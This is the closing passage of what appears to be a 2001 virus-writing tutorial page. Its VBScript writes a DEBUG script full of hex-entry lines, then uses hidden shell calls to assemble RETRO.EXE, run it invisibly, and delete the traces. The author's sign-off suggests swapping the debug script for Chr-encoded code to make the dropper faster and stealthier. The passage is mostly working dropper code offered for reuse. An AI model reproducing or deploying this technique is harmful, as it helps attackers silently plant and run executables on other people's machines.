Fil.WriteLine("e F00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e F10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e F20 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e F30 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e F40 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e F50 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e F60 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e F70 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e F80 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e F90 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e FA0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e FB0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e FC0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e FD0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e FE0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e FF0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 1000 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 1010 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 1020 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 1030 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 1040 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 1050 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 1060 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 1070 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 1080 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 1090 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 10A0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 10B0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 10C0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 10D0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 10E0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 10F0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ")<br>
Fil.WriteLine("e 1100 0 ")<br>
Fil.WriteLine("rcx")<br>
Fil.WriteLine("1000")<br>
Fil.WriteLine("w")<br>
Fil.WriteLine("q")<br>
Fil.Close<br>
<br>
Com = WSS.ExpandEnvironmentStrings("%COMSPEC%")<br>
WSS.Run Com &amp; " /C DEBUG &lt; RETRO.SCR > NUL", SW_HIDE, TRUE<br>
WSS.Run Com &amp; " /C REN RETRO.DAT RETRO.EXE", SW_HIDE, TRUE<br>
WSS.Run "RETRO.EXE", SW_HIDE, TRUE<br>
WSS.Run Com &amp; " /C DEL RETRO.SCR", SW_HIDE, TRUE<br>
WSS.RUN Com &amp; " /C DEL RETRO.EXE", SW_HIDE, TRUE<br>
--------------------------------<br>
<br>
 This is not a fast and stealthy way so it's better to use some Chrs<br>
 in your code instead of the debug script to do it, but i am to lazy<br>
 to write some code so you may find the way...<br>
<br>
 That's all.<br>
<br>
 If you have any question/correction/comment feel entirely free to<br>
 mail me at liteno2@softhome.net. Constructive critics and corrections<br>
 are well appreciated.<br>
<br>
 Peace,<br>
 LiteSYS/XAKER - Venezuela 2001.<br>
</font>
</p>

</body>

</html>
